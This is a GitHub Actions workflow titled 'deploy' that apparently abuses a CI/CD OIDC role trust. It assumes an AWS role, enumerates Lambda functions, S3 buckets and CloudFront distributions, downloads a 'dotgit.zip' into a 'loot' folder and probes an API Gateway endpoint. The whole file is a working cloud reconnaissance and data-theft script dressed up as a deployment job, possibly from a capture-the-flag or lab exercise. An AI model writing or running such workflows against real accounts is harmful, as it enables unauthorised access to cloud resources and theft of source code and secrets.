name: deploy

on:
  push:
    branches:
      - corgi

jobs:
  aws:
    runs-on: ubuntu-latest

    permissions:
      id-token: write
      contents: read

    steps:
      - name: Get AWS credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::009661764077:role/cicdRole
          aws-region: us-east-1

      - name: AWS identity
        run: |
          aws sts get-caller-identity

      - name: Lambda info
        run: |
          echo "===== LAMBDA CONFIG ====="
          aws lambda get-function-configuration \
            --function-name nslookupv2

          echo "===== LAMBDA POLICY ====="
          aws lambda get-policy \
            --function-name nslookupv2

      - name: S3 enumeration
        run: |
          echo "===== BUCKETS ====="
          aws s3 ls

          echo "===== PLATFORM BUCKET ====="
          aws s3 ls s3://platform-bucket-009661764077-us-east-1/

          echo "===== SITE BUCKET ====="
          aws s3 ls s3://site781fe43f26b9eba3/ || true

      - name: Download dotgit
        run: |
          mkdir -p loot
          aws s3 cp \
            s3://platform-bucket-009661764077-us-east-1/dotgit.zip \
            loot/dotgit.zip

          unzip -l loot/dotgit.zip

      - name: CloudFront discovery
        run: |
          echo "===== CLOUDFRONT ====="
          aws cloudfront list-distributions || true

      - name: Try API Gateway invoke
        run: |
          echo "===== TEST API ====="

          curl -i \
          https://3q931syi7b.execute-api.us-east-1.amazonaws.com/
